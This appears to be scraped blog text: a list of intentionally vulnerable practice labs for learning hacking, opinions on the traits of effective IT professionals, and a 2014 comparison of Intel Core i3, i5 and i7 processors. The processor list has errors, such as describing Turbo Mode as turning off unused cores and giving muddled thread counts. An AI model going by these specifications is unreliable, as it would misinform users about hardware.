Download practice environments to practice
and hone newly learned skills
DVWA (Dam Vulnerable Web Application)
Metasploitable
Samurai WTF
Final note: Hacking is something that takes A
LOT of your time!, be prepared to sacrifice
friendships, relationships and that awesome
social life you used to have!

Characteristics of an effective IT professional

Patience, patience and more patience - IT
can be stressful, fun, challenging and a
whole lot of other things! Having an
overflowing supply of patience – with users,
with other techs, with software, with
hardware, with vendors, with bosses and
with self is of major value!
Ability to adapt quickly to change is another
ingredient that I believe is essential. IT
needs, tools and equipment is constantly
changing – and keeping up with it can be a
challenge. Those that can adapt quickly shrug
off the discarded work of the past in favor of
attacking the new, without seeing the past
work as being futile or a “waste” of time.
A positive outlook is a must have for an
effective IT professional. Change and “issues”
of all kinds crop up daily in the IT world – so
having a positive attitude brings about
stability in self and the environment – things
are just better.
The effective IT professional is not a 9 to 5
person - IT functions often require that work
be done “off” hours. The most miserable IT
person I ever worked with really just wanted
a job to go to between 9 -5. Needless to say,
he didn't work out!
A love for challenge rounds out my top 5
characteristics of an effective IT person. IT is
NOT easy street — it is NOT narrowly defined
— it can be multi-disciplined, requiring
knowledge way beyond the technical. IT is
NOT for everyone — good thing — if it was,
everyone would be doing it whether they
posses these characteristics or not!

Friday 1 August 2014

DIFFERENCE BETWEEN CORE I3, CORE i5, CORE I7.

► Core i3:
* Entry level processor.
* 2-4 Cores
* 4 Threads
* Hyper-Threading (efficient use of
processor resources)
* 3-4 MB Cache
* 32 nm Silicon (less heat and energy)
► Core i5:
* Mid range processor.
* 2-4 Cores
* 4 Threads
* Turbo Mode (turn off core if not used)
* Hyper-Threading (efficient use of
processor resources)
* 3-8 MB Cache
* 32-45 nm Silicon (less heat and energy)
► Core i7:
* High end processor.
* 4 Cores
* 8 Threads
* Turbo Mode (turn off core if not used)
* Hyper-Threading (efficient use of
processor resources)
* 4-8 MB Cache
* 32-45 nm Silicon (less heat and energy)